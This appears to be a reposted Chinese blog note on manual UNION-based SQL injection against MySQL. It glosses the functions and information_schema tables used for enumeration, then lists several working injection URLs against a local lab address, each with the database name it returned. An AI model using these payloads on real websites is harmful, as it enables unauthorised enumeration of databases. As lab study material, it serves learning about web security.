本文共 1089 字，大约阅读时间需要 3 分钟。

schema_name 如果对象在 SQL Server 数据库中，则指定包含对象的架构的名称。 如果对象在链接服务器中，则 schema_name 将指定 OLE DB 架构名称 。

group_concat(str) 将获取到的内容合并成一行输出

concat_ws(str1,str2…) 合并输出查询的字段

table_name 具体的数据表

column_name 字段名

information_schema 自5.7及后的MySQL版本，都有了这个库，所有的表都会记录在这个数据库下

information_schema.tables 所有的数据表

information_schema.columns 所有的数据表中的字段

table_schema 数据库的名称

where 筛选指定内容

order by 判断有多少字段

database() 查看当前使用什么数据库

version() 查看当前使用什么版本的MySQL

@@datadir 查看当前MySQL的路径

查询其它数据库名称

http://172.0.0.1/index.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1 >> mozhe_Discuz_StormGroup

http://172.0.0.1/index.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 2,1 >> mysql

http://172.0.0.1/index.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 3,1 >> performance_schema

http://172.0.0.1/index.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 4,1 >> sys

转载地址：https://blog.csdn.net/nextlubricate/article/details/116547740 如侵犯您的版权，请留言回复原文章的地址，我们会给您删除此文章，给您带来不便请您谅解！